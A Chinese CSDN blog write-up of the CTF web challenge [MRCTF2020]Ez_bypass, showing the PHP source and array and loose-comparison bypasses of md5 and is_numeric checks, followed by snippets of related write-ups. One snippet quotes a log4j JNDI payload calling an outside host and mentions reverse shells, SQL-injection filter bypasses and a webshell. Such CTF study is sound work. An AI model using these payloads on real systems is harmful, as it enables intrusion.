BUU-WEB-[MRCTF2020]Ez_bypass

最新推荐文章于 2024-08-01 00:13:13 发布
最新推荐文章于 2024-08-01 00:13:13 发布
阅读量205 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116703542
版权

[MRCTF2020]Ez_bypass

在这里插入图片描述
进去很明显进行php代码审计。F12中还隐藏着部分源码。

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

第一层绕过:
以get方式提交gg和id,md5值相等,但是值不相等。
以常规的0e开头尝试绕过,构建payload:

?gg=s155964671a&id=s878926199a

在这里插入图片描述
(没绕过去)
换一种方式,借助数组绕过:
在这里插入图片描述
(添加成数组后成功绕过第一层)
第二层绕过:
passwd不能为数字,但又得等于1234567,
通过构建字符串绕过,通过post方式提交
在这里插入图片描述
成功得到flag。

TzZzEZ-web
关注
专栏目录
[MRCTF2020] web题-Ez_bypass
BROTHERYY的博客
08-18 367
复现环境:buuoj.cn 开题源码一份 //I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id
【学习笔记 44】 buu [MRCTF2020]Ez_bypass
weixin_43553654的博客
08-03 280
0x00 知识点 绕过md5()函数 绕过is_numeric()函数 代码审计 0x01 知识点详解 md5()函数怎么绕过? 答:本题是将两参数传成数组,由于md5()函数无法操作数组,也就判断都为null,像个参数的md5值也就相同了。 is_numeric()函数怎么绕过? 答:is_numeric() 函数用于检测变量是否为数字或数字字符串。本题由于在这个函数之后还有一个弱类型比较,所以要用1234567a绕。1234567a是字符串,但是弱类型比较的时候,1在前,php会将其整体转成数字,
BUUCTF WEB [MRCTF2020]Ez_bypass
Y1da的博客
04-18 438
BUUCTF WEB [MRCTF2020]Ez_bypass 进入环境,提示 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&a
bugku-web-ezbypass
最新发布
m0_52484587的博客
08-01 241
毫不夸张的说这道题目解题的思路比较新颖,使用了自增的方式,当然一提到自增,你可能就会想起程序设计中的i++,++i,其实这样理解的话,也没什么问题,但是真正有趣的就是,这里直接自增的是字符串里的字母,我就是一个字符一个字符的调的,我还是相信那就话,慢就是快。原文链接:https://blog.csdn.net/m_de_g/article/details/138110100。
BUUCTF - Web - Ez_bypass
1tachi的博客
11-27 315
得到一个php源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) {
BUGKU--web详解
qq_49422880的博客
05-28 2001
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
BUGKU-WEB ezbypass
天泽岁月
03-12 1501
BUGKU-WEB ezbypass,正则绕过,自增绕过
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 353
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4328
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
buu-[MRCTF2020]Xor
qaq517384的博客
03-06 324
32位无壳 执行 ida查看字符串
[MRCTF2020]Easy_RSA
2er0!=O的博客
07-25 1002
[MRCTF2020]Easy_RSA 附件: import sympy from gmpy2 import gcd, invert from random import randint from Crypto.Util.number import getPrime, isPrime, getRandomNBitInteger, bytes_to_long, long_to_bytes import base64 from zlib import * flag = b"MRCTF{XXXX}" base
bugku ezbypass
m_de_g的博客
04-23 531
bugku ezbypass $++,$_++
bugku学习之26.过狗一句话 - 解题及其它完整(bypass绕过)重点!!!
s11show_163的博客
03-01 1106
打不开但是原理比较重要,去回顾bypass安全狗绕过的相关知识 用php的系统函数,突破低权限。 题目来自于bugku的"过狗一句话",这道题目有接近2100人做出来,可是网上的wp并没有给出确切的原理,所以在此借这一道题目,抛砖引入。 一丶代码和分析 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //exp...
BUUCTF:[MRCTF2020]Ez_bypass
末初的CSDN博客
12-04 2136
https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass 右键查看源代码 include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&amp
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7378
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码中,提供了一个github地址。
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4454
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3288
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2965
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[长安杯]web-shiro复现
qq_24033605的博客
01-12 2227
长安杯-shiro?复现 浏览器显示是springboot框架 登录伪造shiro,关键词为remeber-me shiro直接打,打不进去 springboot还可以写log4j漏洞,测试一下 jndi被过滤了 进行绕过 ${${::-j}ndi:rmi://py2hu7.ceye.io/exp} 成功接收到dnslog信息。 构建jndi反弹shell,这里反弹shell的命令需要bypass一下 在这里插入代码片 反弹的有点慢,但是可以成功反弹shell并拿取flag。 ...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值